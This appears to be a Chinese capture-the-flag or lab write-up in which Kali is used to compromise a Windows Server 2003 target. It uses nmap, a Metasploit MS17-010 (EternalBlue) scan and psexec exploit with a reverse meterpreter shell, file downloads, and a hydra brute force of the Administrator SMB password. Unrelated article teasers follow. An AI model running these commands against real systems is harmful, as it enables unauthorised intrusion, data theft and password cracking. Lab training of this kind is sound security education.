记一次某竞赛中的渗透测试(Windows Server 2003靶机漏洞)

在这里插入图片描述

靶机简介

Windows Server 2003是微软公司于2003年3月28日发布的服务器操作系统,它基于Windows XP/Windows NT 5.1进行开发,并在同年4月底上市。以下是关于Windows Server 2003的详细介绍:

  1. 系统名称与发布历程:
  • 该产品最初被命名为“Windows .NET Server”,之后更名为“Windows .NET Server 2003”,最终定名为“Windows Server 2003”。
  1. 主要功能与特点:
  • “Windows Driver Protection”功能:此功能可以防止安装被指出存在故障的驱动程序,并提示用户购买升级版本。
  • “Driver Rollback”功能:当因存在缺陷的驱动程序而产生错误时,此功能可以更迅速地修复Windows Server 2003。
  • 日志记录功能:只要用户打开日志记录,就能查看谁在访问什么内容,这有助于偶尔检查日志以发现是否有入侵迹象。
  • 备份与恢复:如果出现某种软件或硬件故障,用户之前手动进行的备份可以被恢复。
  1. 改进之处:
  • 相对于Windows 2000,Windows Server 2003在多个方面进行了改进,如改进的Active Directory(活动目录)、Group Policy(组策略)操作和管理、磁盘管理等。
  • 特别是在脚本和命令行工具方面的改进,对微软来说是一次革新,因为它将一个完整的命令外壳带入了下一个版本的Windows。
  1. 安全性与支持:
  • Windows Server 2003的支持在2015年7月14日结束,此后其安全性不再获得保障。运行Windows Server 2003的所有数据中心在2015年7月14日之后将无法获得官方发布的更新和修补程序,也无法满足合规性要求。
  • 然而,值得注意的是,在2017年5月,针对**“永恒之蓝”病毒**,微软向该系统推送了补丁。

总的来说,Windows Server 2003是微软推出的一款广泛使用的服务器操作系统,它提供了一系列的功能和改进,但在其生命周期的后期,微软结束了对它的官方支持。

准备工作

攻击机:Kali
靶机:Windows Server 2003

任务说明

任务编号任务描述答案格式:flag{xxx}分值
任务一请提交靶机445端口对应的服务状态信息flag{open}20
任务二请提交靶机首选DNS服务器地址flag{192.168.229.2}20
任务三请提交靶机桌面上111文件夹文档内容flag{s4f4s4d4fs45f4s61s31fs4f654s}20
任务四请提交靶机回收站中文档的内容flag{s4f4s4d4fs45f4s61s31fs4f654s}20
任务五请提交靶机管理员账号密码flag{Admin123456…}20

渗透过程

任务一

Nmap扫描端口信息

nmap扫描靶机IP地址及端口开启状态

1、ifconfig查看攻击机Kali的IP地址
2、nmap扫描此IP网段的存活IP以及端口开启状态
*注意:攻击机和靶机均保持启动状态   网络适配器模式均为NAT模式

image.png

flag

任务一:flag{open}

任务二

启动msf攻击框架

查看msfdb数据库状态
service postgresql status

开启msfdb数据库
service postgresql start

初始化msfdb数据库
msfdb init

msfdb数据库已开启
service postgresql status

image.png

进入msf攻击框架

msfconsole

查看是否成功进入msf攻击框架
db_status

image.png

探测是否存在漏洞

查看ms17_010漏洞所有模块
search ms17_010

image.png

选择利用模块
use auxiliary/scanner/smb/smb_ms17_010

image.png

设置被攻击IP
set rhost 192.168.229.132

image.png

设置攻击线程
set threads 20

image.png

探测
run

image.png

出现likely表示存在漏洞

利用模块进行攻击

1.利用攻击模块
use exploit/windows/smb/ms17_010_psexec
2.设置被攻击IP
set rhost 192.168.229.132
3.设置攻击端口
set rport 445
4.设置监听IP
set lhost 192.168.229.129
5.设置监听端口
set lport 6666
6.进行攻击
run
*注意:出现meterpreter表示攻击成功!

image.png

进入靶机终端
shell

查看首选DNS服务器地址
ipconfig/all

image.png

flag

任务二:flag{192.168.229.2}

任务三

进入靶机桌面目录

退出靶机终端
考虑到进入靶机终端乱码问题,所以选择退出靶机终端,在msf中进行操作
exit

image.png

进入靶机C盘目录
cd C:/

image.png

进入桌面目录
*注意:命令和目录都可以补全

image.png

将111文件下载到攻击机
download 111

image.png

查看111文件内容

image.png

flag

任务三:flag{s4f4s4d4fs45f4s61s31fs4f654s}

任务四

进入靶机回收站目录

image.png

将回收站中的文件下载到攻击机

image.png

查看文件内容

*注意:此文件夹中有多个文件,题目要求是查看文档内容,那么就是doc文档

image.png

flag

**任务四:flag{s4f4s4d4fs45f4s61s31fs4f654s} **

任务五

指定用户名选择密码字典进行爆破

什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

hydra -l Administrator -P password.txt smb://192.168.229.132 -vV
-l 指定破解的用户 对特定用户破解
-P 指定密码字典
smb协议
-vV 显示详细过程
通过smb协议对Administrator用户进行密码爆破,并显示爆破的详细过程

image.png
image.png

登录靶机成功

image.png
image.png
image.pngimage.png
image.png

flag

任务五:flag{Admin123456…}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/249735.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

设计模式——2_0 职责链(Chain of Responsibility)

楼下一个男人并得要死,那家隔壁的一家唱着留声机,对面是弄孩子。楼上有两人狂笑;还有打牌声,河中的船上有女人哭她死去的母亲。人类的悲欢并不相通,我只觉得他们吵闹 ——鲁迅 文章目录 定义图纸一个例子:如…

LEETCODE 170. 交易逆序对的总数

class Solution { public:int reversePairs(vector<int>& record) {if(record.size()<1)return 0;//归并 递归int left,right;left0;rightrecord.size()-1;int nummergeSort(left,right,record);return num;}int mergeSort(int left,int right, vector<int>…

C++:异常体系

异常体系 异常1.C语言传统的处理错误的方式2.C异常概念3.异常的使用3.1异常的抛出和捕获3.2 异常的重新抛出3.3异常安全3.4 异常规范 4.C标准库的异常体系5.异常的优缺点 异常 1.C语言传统的处理错误的方式 终止程序&#xff0c;如assert&#xff0c;缺陷&#xff1a;用户难以…

Android super.img解包和打包指南(含工具下载lpunpack、lpmake、lpdump)

本文所有命令均需要在linux 上执行 一、解包 1、将Android sparse image格式的super.img转成二进制文件 $ sudo apt install android-sdk-libsparse-utils $ simg2img super.img super.img.bin 2、下载工具lpunpack 和lpmake、lpdump 以及其依赖库 下载地址:https://downl…

python执行linux系统命令的三种方式

前言 这是我在这个网站整理的笔记,有错误的地方请指出&#xff0c;关注我&#xff0c;接下来还会持续更新。 作者&#xff1a;神的孩子都在歌唱 1. 使用os.system 无法获取命令执行后的返回信息 import osos.system(ls)2. 使用os.popen 能够获取命令执行后的返回信息 impor…

c++学习第十四讲---STL常用容器---vector容器

vector容器&#xff1a; 1.vector基本概念&#xff1a; vector功能与数组类似&#xff0c;与数组不同的是&#xff0c;vector可以动态扩展。 2.vector构造函数&#xff1a; vector<T> v; //默认构造函数&#xff0c;创建数据类型T的容器 ve…

2022 年全国职业院校技能大赛高职组云计算赛项试卷部分解析

2022 年全国职业院校技能大赛高职组云计算赛项试卷部分解析 【赛程名称】高职组-云计算赛项第一场-私有云【任务 1】私有云服务搭建[10 分]【题目 2】Yum 源配置[0.5 分]【题目 3】配置无秘钥 ssh[0.5 分]【题目 4】基础安装[0.5 分]【题目 5】数据库安装与调优[0.5 分]【题目 …

Cloudreve个人网盘系统源码 支持云存储(七牛、阿里云OSS、腾讯云COS、又拍云、OneDrive) 基于Go框架

现在的网盘动不动就限速&#xff0c;涨价&#xff0c;弄得很是心烦。今天分享一款开源免费的网盘项目&#xff0c;基于 Go 语言开发的 Cloudreve。Cloudreve基于Go框架云存储个人网盘系统源码支持多家云存储驱动&#xff08;从机、七牛、阿里云 OSS、腾讯云 COS、又拍云、OneDr…

05:容器镜像技术揭秘|发布容器服务器|私有镜像仓库

容器镜像技术揭秘&#xff5c;发布容器服务器&#xff5c;私有镜像仓库 创建镜像使用commit方法创建自定义镜像。Dockerfile打包镜像创建apache服务镜像制作 php 镜像 微服务架构创建nginx镜像 发布服务通过映射端口发布服务容器共享卷 docker私有仓库 创建镜像 使用commit方法…

vit细粒度图像分类(八)SIM-Trans学习笔记

1.摘要 细粒度视觉分类(FGVC)旨在从相似的从属类别中识别物体&#xff0c;这对人类准确的自动识别需求具有挑战性和实用性。大多数FGVC方法侧重于判别区域挖掘的注意机制研究&#xff0c;而忽略了它们之间的相互依赖关系和组成的整体对象结构&#xff0c;而这些对模型的判别信…

vue3 [Vue warn]: Unhandled error during execution of scheduler flush

文章目录 前言一、报错截图二、排除问题思路相关问题 Vue3 优雅解决方法异步组件异同之处&#xff1a;好处&#xff1a;在使用异步组件时&#xff0c;有几个注意点&#xff1a; vue3 定义与使用异步组件 总结 前言 Bug 记录。开发环境运行正常&#xff0c;构建后时不时触发下面…

基于C/C++的MFC的IDC_MFCEDITBROWSE2控件不显示ico问题记录

打开资源文件 *.rc文件 &#xff0c;在最上方添加 #if !defined(_AFXDLL) #include "afxribbon.rc" // MFC ribbon and control bar resources #endif 如下图所示&#xff1a;

【SpringCloud】使用OpenFeign进行微服务化改造

目录 一、需求与背景二、OpenFeign 远程调用技术原理三、项目代码演示3.1 引入依赖3.2 实现OpenFeign注解修饰接口3.3 指定 OpenFeign 远程调用接口的扫描路径 四、OpenFeign 在日志中打印Request和Response五、OpenFeign 客户端超时配置六、使用 OpenFeign 实现服务降级6.1 实…

C语言数据结构之二叉树

少年恃险若平地 独倚长剑凌清秋 &#x1f3a5;烟雨长虹&#xff0c;孤鹜齐飞的个人主页 &#x1f525;个人专栏 &#x1f3a5;前期回顾-栈和队列 期待小伙伴们的支持与关注&#xff01;&#xff01;&#xff01; 目录 树的定义与判定 树的定义 树的判定 树的相关概念 树的运用…

网络编程套接字(2)

TCP 简单的TCP网络程序服务端创建套接字 服务端绑定服务端监听服务端接收连接测试服务端处理请求客户端创建套接字客户端连接服务器客户端连接服务器单执行流的服务器客户端为什么会显示连接成功&#xff1f; 多进程版的TCP网络程序让孙子进程提供服务 多线程版的TCP网络程序 简…

设计模式——模板方法模式(Template Method Pattern)

概述 模板方法模式&#xff1a;定义一个操作中算法的框架&#xff0c;而将一些步骤延迟到子类中。模板方法模式使得子类可以不改变一个算法的结构即可重定义该算法的某些特定步骤。模板方法模式是一种基于继承的代码复用技术&#xff0c;它是一种类行为型模式。模板方法模式是结…

基于node.js和Vue3的医院挂号就诊住院信息管理系统

摘要&#xff1a; 随着信息技术的快速发展&#xff0c;医院挂号就诊住院信息管理系统的构建变得尤为重要。该系统旨在提供一个高效、便捷的医疗服务平台&#xff0c;以改善患者就医体验和提高医院工作效率。本系统基于Node.js后端技术和Vue3前端框架进行开发&#xff0c;利用其…

【Emgu CV教程】6.8、图像平滑之BilateralFilter()双边滤波

文章目录 一、介绍1.原理2.函数介绍 二、举例1.原始素材2.代码3.运行结果 一、介绍 1.原理 BilateralFilter()双边滤波也是非线性滤波&#xff0c;之前介绍的滤波只考虑空间信息&#xff08;滤波核或邻域&#xff09;&#xff0c;容易造成边缘模糊和细节丢失&#xff0c;相比…

在Windows系统中执行DOS命令

目录 一、用菜单的形式进入DOS窗口 二、通过IE浏览器访问DOS窗口 三、复制、粘贴命令行 四、设置窗口风格 1.颜色 2.字体 3.布局 4.选项 五、Windows系统命令行 由于Windows系统彻底脱离了DOS操作系统&#xff0c;所以无法直接进入DOS环境&#xff0c;只能通过第三方软…

UE4学习笔记 FPS游戏制作3 添加武器

文章目录 章节目标为骨骼添加武器挂载点添加武器 章节目标 本章节为手部添加一个武器挂载点&#xff0c;并挂载一个武器 为骨骼添加武器挂载点 添加挂载点需要以一个动画片段为基础&#xff0c;为骨骼添加挂载点。 首先找到我们需要的动画片段&#xff0c;通常是idle 双击打…